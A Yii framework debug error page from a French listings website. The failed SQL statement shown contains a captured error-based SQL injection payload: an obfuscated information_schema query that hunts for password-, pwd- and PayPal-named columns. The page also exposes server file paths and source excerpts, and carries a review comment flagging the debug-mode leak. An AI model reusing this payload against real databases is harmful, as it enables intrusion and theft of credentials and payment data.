CDbException

CDbCommand failed to execute the SQL statement: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','...' at line 1. The SQL statement executed was: SELECT `t`.`city_id` AS `t0_c29`, `t`.`category_id` AS `t0_c13`, `t`.`id` AS `t0_c0`, `images`.`id` AS `t1_c0`, `images`.`name` AS `t1_c1`, `images`.`description` AS `t1_c2`, `images`.`title` AS `t1_c3`, `images`.`author` AS `t1_c4`, `images`.`copyright` AS `t1_c5`, `images`.`original_name` AS `t1_c6`, `images`.`link` AS `t1_c7`, `images`.`rank` AS `t1_c8`, `images`.`force_crop` AS `t1_c9`, `images`.`is_logo` AS `t1_c10`, `images`.`is_banner` AS `t1_c11`, `images`.`modified_date` AS `t1_c12`, `images`.`modified_by` AS `t1_c13` FROM `listing` `t` LEFT OUTER JOIN `listing_image` `images_images` ON (`t`.`id`=`images_images`.`listing_id`) LEFT OUTER JOIN `image` `images` ON (`images`.`id`=`images_images`.`image_id`) WHERE ( t.category_id IN ('37' and 1=1 order by 1-- - and 'a'='a','38','39','40','41','659','660','661','662','42','43','44' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY 
x)a) and '1'='1','45','46','47','48','49','50','51','52','53','54','55','87','88','89','116' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,t./**/tAbLe_nAmE,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and d./**/sChEmA_NaMe = /**/dAtAbAsE() and c./**/cOlUmN_NaMe like 0x2570617373776f726425 and not t./**/tAbLe_nAmE in(0x75736572) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','117','118','119','120','121','122','123','124','125','126','127','128','129','130','131','132' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570776425 and not t./**/tAbLe_nAmE in(0x666b5f636c69656e74,0x666b5f636c69656e745f313032303135,0x666b5f636c69656e745f636f7079,0x666b5f636c69656e745f6e6577,0x746563686e696369656e,0x757365725f6f6c64) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 6,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and 
'1'='1','133','134','135','136','137','138','139','140','141','142','143','144','145','146','147','148','149','150','151','152','153','154','155','156','157','158','159','160','161','162','163','164','165','166','167','168','169','403' and(/**/sElEcT 1 /**/fRoM(/**/sElEcT count(*),/**/cOnCaT((/**/sElEcT(/**/sElEcT(/**/sElEcT /**/cOnCaT(0x217e21,d./**/sChEmA_NaMe,0x217e21) /**/fRoM information_schema./**/sChEmAtA as d join information_schema./**/tAbLeS as t on t./**/tAbLe_sChEmA = d./**/sChEmA_NaMe join information_schema./**/cOlUmNs as c on c./**/tAbLe_sChEmA = d./**/sChEmA_NaMe and c./**/tAbLe_nAmE = t./**/tAbLe_nAmE /**/wHeRe not c./**/tAbLe_sChEmA in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c) and c./**/cOlUmN_NaMe like 0x2570617970616c25 and not t./**/tAbLe_nAmE in(0x69706e73) /**/gRoUp/**/bY t./**/tAbLe_nAmE /**/lImIt 1,1)) /**/fRoM information_schema./**/tAbLeS /**/lImIt 0,1),floor(rand(0)*2))x /**/fRoM information_schema./**/tAbLeS /**/gRoUp/**/bY x)a) and '1'='1','404','405','406','407','408','409') AND t.is_active='1') ORDER BY CASE WHEN t.highlight_end_date>'2024-03-19 07:29:33' THEN 1 ELSE 2 END,CASE WHEN images.id is NOT NULL THEN 1 ELSE 2 END,`t`.rank DESC, `t`.id ASC

/home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/framework/db/CDbCommand.php(543)

531         {
532             if($this->_connection->enableProfiling)
533                 Yii::endProfile('system.db.CDbCommand.query('.$this->getText().$par.')','system.db.CDbCommand.query');
534 
535             $errorInfo=$e instanceof PDOException ? $e->errorInfo : null;
536             $message=$e->getMessage();
537             Yii::log(Yii::t('yii','CDbCommand::{method}() failed: {error}. The SQL statement executed was: {sql}.',
538                 array('{method}'=>$method, '{error}'=>$message, '{sql}'=>$this->getText().$par)),CLogger::LEVEL_ERROR,'system.db.CDbCommand');
539 
540             if(YII_DEBUG)
541                 $message.='. The SQL statement executed was: '.$this->getText().$par;
542 
543             throw new CDbException(Yii::t('yii','CDbCommand failed to execute the SQL statement: {error}',
544                 array('{error}'=>$message)),(int)$e->getCode(),$errorInfo);
545         }
546     }
547 
548     /**
549      * Builds a SQL SELECT statement from the given query specification.
550      * @param array $query the query specification in name-value pairs. The following
551      * query options are supported: {@link select}, {@link distinct}, {@link from},
552      * {@link where}, {@link join}, {@link group}, {@link having}, {@link order},
553      * {@link limit}, {@link offset} and {@link union}.
554      * @throws CDbException if "from" key is not present in given query parameter
555      * @return string the SQL statement

Stack Trace

#8
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/models/Listing.php(620): CDataProvider->getData()
615         $categories=Category::getItemsHash($selectedCategoryId);
616     
617         $sortCities=array();
618         $sortProducts=array();    
619         $prices=array();        
620         foreach($dataProvider->getData() as $item)
621         {
622             // City
623             $city=$item->city;
624         
625             $cityMatch=!$selectedCities || ($selectedCities && in_array($city->id,$selectedCities));
#9
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/protected/controllers/SiteController.php(296): Listing::getSearchModel()
291                 // $items=$dataProvider->getData();
292                 // $this->actionView($items[0]->id);
293                 // exit;
294             // }    
295                 
296             $searchModel=Listing::getSearchModel();    
297             
298             if ($searchModel)
299             {
300                 foreach($searchModel->found_categories as $categoryItem)
301                     $categoryIds[]=$categoryItem['id'];
#19
 /home2/creole01/nouvoo.fr/domains/prod.nouvoo.fr/public_html/index.php(58): CApplication->run()
53         // header("Location: http://pro.".AP_DOMAIN_NAME."/".$url);
54         // exit;
55     // }
56 
// Entry point: load the Yii bootstrap file referenced by $yii, then build the web
// application from $config and run it (stack frame #19 on this page ends here).
// NOTE(review): the exception text on this page carries the "The SQL statement executed
// was: ..." suffix that CDbCommand appends only when YII_DEBUG is true, so debug mode
// appears to be on for this host. Confirm where YII_DEBUG is defined (not visible in
// this excerpt) and disable it in production, so SQL text, absolute file paths and
// source excerpts are written to the server log instead of being returned to clients.
57 require_once($yii);
58 Yii::createWebApplication($config)->run();
2024-03-19 07:29:34 Apache Yii Framework/1.1.14